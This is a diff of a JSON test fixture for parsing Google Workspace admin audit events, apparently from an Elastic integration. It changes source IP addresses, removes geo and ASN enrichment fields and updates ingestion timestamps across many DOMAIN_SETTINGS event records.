"original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPLOAD_OAUTH_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "UPLOAD_OAUTH_CERTIFICATE", "id": "1", @@ -4765,7 +3721,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -4789,35 +3745,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091408700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REGENERATE_OAUTH_CONSUMER_SECRET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.916066300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REGENERATE_OAUTH_CONSUMER_SECRET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "REGENERATE_OAUTH_CONSUMER_SECRET", "id": "1", @@ -4847,7 +3785,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -4871,35 +3809,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091417300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OPEN_ID_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:31.916070300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OPEN_ID_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_OPEN_ID_ENABLED", "id": "1", @@ -4930,7 +3850,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -4954,35 +3874,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091420400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ORGANIZATION_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916075100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ORGANIZATION_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_ORGANIZATION_NAME", "id": "1", @@ -5012,7 +3914,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -5036,35 +3938,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091423Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OUTBOUND_RELAY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:31.916078800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OUTBOUND_RELAY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "TOGGLE_OUTBOUND_RELAY", "id": "1", 
@@ -5095,7 +3979,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5119,35 +4003,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091425700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MAX_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916083500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MAX_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_PASSWORD_MAX_LENGTH", "id": "1", 
@@ -5177,7 +4043,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5201,35 +4067,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091428500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MIN_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916087900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MIN_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_PASSWORD_MIN_LENGTH", "id": "1", 
@@ -5259,7 +4107,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5283,35 +4131,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091431100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916092400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL", "id": "1", 
@@ -5341,7 +4171,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5365,35 +4195,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091434Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916096300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS", "id": "1", 
@@ -5424,7 +4236,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5448,35 +4260,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091436900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", + "ingested": "2021-12-09T13:38:31.916101200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", "provider": "admin", "action": "REMOVE_APPLICATION", "id": "1", @@ -5506,7 +4300,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -5530,35 +4324,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091453500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", + "ingested": "2021-12-09T13:38:31.916105800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"appid\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"}]}}", "provider": "admin", "action": "REMOVE_APPLICATION_FROM_WHITELIST", "id": "1", @@ -5588,7 +4364,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -5612,35 +4388,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091458700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RENEW_DOMAIN_REGISTRATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916110700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RENEW_DOMAIN_REGISTRATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_RENEW_DOMAIN_REGISTRATION", "id": "1", @@ -5670,7 +4428,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -5692,35 +4450,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091461600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RESELLER_ACCESS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916116600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RESELLER_ACCESS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_RESELLER_ACCESS", "id": "1", @@ -5750,7 +4490,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -5774,35 +4514,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091464400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_ACTIONS_CHANGED\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", + "ingested": "2021-12-09T13:38:31.916121900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_ACTIONS_CHANGED\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "RULE_ACTIONS_CHANGED", "id": "1", @@ -5832,7 +4554,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -5856,35 +4578,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091467200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", + "ingested": "2021-12-09T13:38:31.916125600Z", + "original": 